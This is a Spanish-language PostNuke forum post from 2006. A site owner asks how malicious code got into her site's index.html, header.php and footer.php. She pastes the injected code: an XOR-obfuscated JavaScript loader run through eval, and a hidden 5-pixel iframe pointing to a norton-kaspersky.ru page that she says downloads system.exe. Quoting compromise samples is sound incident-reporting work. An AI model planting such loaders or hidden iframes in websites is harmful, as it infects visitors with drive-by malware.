¿Nuevo usuario?
Puedes registrarte aquí
 
       
Menú principal
 
 Navegación
Buscar
dpForo
dpFAQ
dpManuales
dpDescargas
dpThemes
Noticias por Temas
Recomiéndanos
Enlaces
Créditos
dzStaffStatus
Miembros:  Administradores
No Conectado  el_cuervo  
No Conectado  Dixso  
Miembros:  Colaboradores
No Conectado  AnyKiller  
No Conectado  nestormateo  
No Conectado  docser  
Miembros:  Moderadores
No Conectado  cardiru  
No Conectado  javiermisol  
Miembros:  Traductores
No Conectado  gnrx  
Miembros:  Miembros:
Ultimo:  Nuevos Hoy: 3
Ultimo:  Nuevos Ayer: 3
Ultimo:  Total: 74798
Ultimo:  Ultimo:
mendezr23
Miembros:  Conectados
Miembros:  Miembros: 0
Invitados:  Invitados: 39
Total:  Total: 39
Miembros:  Miembros Online
No hay miembros conectados
dp-Tools
 Generador de Menús
 Pop-Up Maker
 Generador de Bloques
 Generador de Módulos
Enlázanos


Texto del enlace:


Otros Banners:



Theme creado por
dev-postnuke.com

 Foro dev-postnuke.com
  Postnuke :: Bugs y soluciones
  LLamada a virus que ser introduce -POR SI SOLO- en el codigo fuente de la web , como fue posible???

Bienvenido invitado

Moderado por: el_cuervo, Dixso, AnyKiller, cardiru, javiermisol << Tema anterior   Tema siguiente >>
Imprimir tema
Autor Tema: LLamada a virus que ser introduce -POR SI SOLO- en el codigo fuente de la web , como fue posible???
Catalinaduque
Enviado: 02/12/2006 a las 22:12
Forero
Forero

avatar

Karma: 8 (4 Votos)

Registrado: 18/09/04
Mensajes: 116

Estado: Desconectado
Ultima visita: 09/07/08
Buenas tardes

Misteriosament -de la nada- en el index de la web empezo a aparecer que se bloqueaba un popup de voena.net , pero sin problemas com a las 3 semanas derepente cuando se entraba a la webpostnuke en antivirus me la bloqueba porqeu hacia una llamada a www.norton-kapersky.com/traff.php

recibe los codigos y habia esto:

En el index.html

****
//x=81;es="53;61;48;33;56;51;57;44;119;45;41;53;41;59;119;71;93;11;5;22;4;11;2;72;26;24;8;81;79;6;27;4;1;72;92;91;3;25;18;22;24;84;21;25;9;81;22;238;226;237;238;237;235;225;169;248;225;250;169;172;250;231;235;228;249;175;162;180;253;243;254;255;241;238;166;173;189;248;237;193;204;199;193;203;215;194;194;218;148;154;139;223;206;220;192;220;221;219;221;211;136;248;248;134;133;149;210;218;207;223;210;165;255;229;234;255;";var ds=new String();ads=es.split(";");k=ads.length-1;for(var j=0;j<k;j++){e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;ds=ds+String.fromCharCode(d);}eval(ds)</body>
</html>

que aunque esta codificado supongo que es el que hace la llama a www.voena.net/incoming.php

******

y en el footer.php y en el header.php encontre el siguiente codigo:


OJO SI NO TIENE UN ANTIVIRUS QUE VIGILE LA WEB NO ENTRAR PORQUE BAJA UN BADWARE A SU DISCO DURO AUTOMATICAMENTE , SEGUN GOOGLE LO DETECTA COMO UN BADWARE Y BAJA UN ARCHIVO LLAMADO SYSTEM.EXE , PERO NO ME DICE MAS NADA

******************

//IFRAME name='StatPage' src='http://www.norton-kaspersky.ru/new/traff.php' width=5 height=5 style='display:none'>

*************



LA PREGUNTA ES:


COMO SE INTRODUJO ESE CODIGO ALLIIII ,.,.,.QUE PASOOOOO

AYUDAAAA


NOTA: borre los codigos y la web trabaja normal


Cata

Dev-postnuke un excelente amigo


...Todos estas cosas nunca pasaron , pero son siempre...

]
Catalinaduque Enviar MP






Powered by pnForum Version 2.6

Inicio  |  dpFaq  |  dpManuales  |  dpDescargas  |  dpThemes  |  Contacta

Web site powered by PostNuke MySQL PHP Postnuke Spain PHP RSSPixel Add to Technorati Favorites

Todos los logos y marcas registradas en este sitio son propiedad de sus respectivos dueños. Los comentarios son propiedad de sus autores, el resto es de este sitio Web (c) 2003, que fue creado con PostNuke, un sistema portal Web escrito en PHP. PostNuke es Software Libre liberado bajo la licencia GNU/GPL.

dixso.net :: Desarrollo Web.

HOSPEDAJE Y DOMINIOS -- Tu Hosting
Alojamiento Web --- Registro de Dominios